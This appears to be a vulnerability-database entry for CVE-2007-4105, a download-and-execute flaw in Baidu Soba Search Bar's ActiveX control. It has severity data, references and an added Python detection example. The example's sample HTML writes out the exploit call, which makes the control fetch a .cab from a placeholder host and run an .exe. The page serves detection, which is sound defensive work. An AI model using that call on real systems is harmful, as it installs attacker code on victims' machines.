CVE-2007-4105
Published 2007-07-31
CVE-2007-4105: A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to…
Priority: P2 · 66
Severity: critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N / AC:M / Au:N / C:C / I:C / A:C
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 7.32% (93.6th percentile)
A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to download and a file to execute," possibly involving remote file inclusion.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| baidu | soba_search_bar | — | — |
Detection & IOCs (extracted from sources)
- Monitor ActiveX method calls to DloadDS on BaiduBar.dll, particularly those supplying a remote .cab URL and an executable filename as arguments. This is the exact exploit primitive used in CVE-2007-4105.
- Detect Internet Explorer loading BaiduBar.dll as an ActiveX control followed by outbound HTTP requests to download .cab files and subsequent process execution; this sequence is indicative of the download-and-execute attack chain.
- The exploit PoC uses a placeholder domain (www.example.com); real-world attacks will substitute an attacker-controlled URL. Detection rules should focus on the DloadDS method call pattern rather than any specific domain.
- Other versions of Baidu Soba beyond 5.4 may also be affected; version-pinned detections targeting only 5.4 may miss vulnerable deployments.
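The following is an added detection example for the two patterns listed above (the DloadDS call shape and the load / .cab fetch / spawn chain). It is not part of this vulnerability record and not a vendor or VulnCheck rule. The event shape, field names, hostnames, file paths and the sample HTML are all constructed for illustration; the events are Sysmon-like but not a real export, and the assumption that DloadDS takes literal string arguments in (url, filename) order follows the record's wording rather than documented control behaviour.

```python
"""Added example: detection logic for CVE-2007-4105's exploit primitive.
Everything here (event fields, hosts, paths, sample HTML) is constructed
for illustration and is not taken from any real capture or rule."""
import re
from datetime import datetime, timedelta

# Pattern 1: a DloadDS invocation carrying a .cab URL and an .exe filename.
# The match keys on the call shape only, so it is domain-agnostic. COM
# method names are case-insensitive from script, hence IGNORECASE.
# Assumption: literal string arguments in (url, filename) order; a call that
# builds its arguments by concatenation needs script instrumentation instead.
DLOADDS_CALL = re.compile(
    r"""\.DloadDS\s*\(\s*["']([^"']*\.cab)["']\s*,\s*["']([^"']*\.exe)["']""",
    re.IGNORECASE,
)


def find_dloadds_calls(content: str):
    """Return (cab_url, exe_name) for every DloadDS call found in page text."""
    return [(m.group(1), m.group(2)) for m in DLOADDS_CALL.finditer(content)]


# Pattern 2: iexplore.exe loads BaiduBar.dll, the same process then fetches a
# .cab, and then spawns a child process, all inside `window` of the DLL load.
def detect_download_execute_chain(events, window=timedelta(minutes=5)):
    """Return one alert per (host, IE pid) that completes load -> cab -> spawn."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for load in events:
        if not (load["event"] == "ImageLoad"
                and load["image"].lower().endswith("\\iexplore.exe")
                and load["loaded"].lower().endswith("\\baidubar.dll")):
            continue
        host, pid, deadline = load["host"], load["pid"], load["ts"] + window
        cab_seen = False
        for ev in events:
            if ev["host"] != host or not (load["ts"] <= ev["ts"] <= deadline):
                continue
            if (not cab_seen and ev["event"] == "HttpRequest"
                    and ev["pid"] == pid and ev["url"].lower().endswith(".cab")):
                cab_seen = True                      # step 2: .cab fetched by IE
            elif (cab_seen and ev["event"] == "ProcessCreate"
                    and ev["parent_pid"] == pid):
                alerts.append({"host": host, "ie_pid": pid,   # step 3: spawn
                               "child": ev["image"], "dll_loaded": load["ts"]})
                break
    return alerts


def _t(hms):
    """Constructed timestamps for the sample events below."""
    return datetime.strptime("2007-08-01 " + hms, "%Y-%m-%d %H:%M:%S")


IE = r"C:\Program Files\Internet Explorer\iexplore.exe"      # constructed path
BAR = r"C:\Program Files\Baidu\Soba\BaiduBar.dll"            # constructed path

# Constructed events: ws01 shows the full chain, ws02 is benign toolbar use.
SAMPLE_EVENTS = [
    {"ts": _t("10:00:00"), "host": "ws01", "event": "ImageLoad", "pid": 1234,
     "image": IE, "loaded": BAR},
    {"ts": _t("10:00:02"), "host": "ws01", "event": "HttpRequest", "pid": 1234,
     "url": "http://cdn.invalid/soba/update.cab"},
    {"ts": _t("10:00:04"), "host": "ws01", "event": "ProcessCreate", "pid": 2345,
     "parent_pid": 1234, "image": r"C:\Windows\Temp\update.exe"},
    {"ts": _t("10:05:00"), "host": "ws02", "event": "ImageLoad", "pid": 777,
     "image": IE, "loaded": BAR},
    {"ts": _t("10:05:01"), "host": "ws02", "event": "HttpRequest", "pid": 777,
     "url": "http://www.baidu.com/"},
]

# Constructed page text; the control's CLSID is omitted on purpose.
SAMPLE_HTML = """<html><body>
<object id="bar"></object>
<script>bar.DloadDS("http://www.example.com/soba.cab", "soba.exe");</script>
</body></html>"""

if __name__ == "__main__":
    print(find_dloadds_calls(SAMPLE_HTML))
    print(detect_download_execute_chain(SAMPLE_EVENTS))
```

In a real deployment the three event kinds map to Sysmon Event ID 7 (image load), a proxy or Event ID 3 network record for the .cab fetch, and Event ID 1 (process creation) with the parent process identifier; the content match belongs in a proxy or IDS rule, which is where the "do not key on the domain" note above matters.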
CVSS provenance
NVD (CVSS 2.0): 9.3 CRITICAL, AV:N/AC:M/Au:N/C:C/I:C/A:C
VulnCheck: 9.3 CRITICAL
GHSA
GHSA-mrvp-cxc3-h9q7 [HIGH]: A certain ActiveX control in BaiduBar
Source: ghsa (unreviewed) · 2022-05-01
A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to download and a file to execute," possibly involving remote file inclusion.
VulnCheck
CVE-2007-4105 [CRITICAL]: Baidu Soba Search Bar 'BaiduBar.dll' Vulnerability
Source: vulncheck · 2007 · CVSS 9.3
A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to download and a file to execute," possibly involving remote file inclusion.
Affected: baidu soba_search_bar
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://betanews.com/2008/05/19/ten-thousand-servers-hit-in-sql-injection-hack/
No detection rules found.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/26256
- http://www.fortiguardcenter.com/advisory/FGA-2007-10.html
- http://www.securityfocus.com/archive/1/475320/100/0/threaded
- http://www.securityfocus.com/bid/25121
- http://www.vupen.com/english/advisories/2007/2699
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35692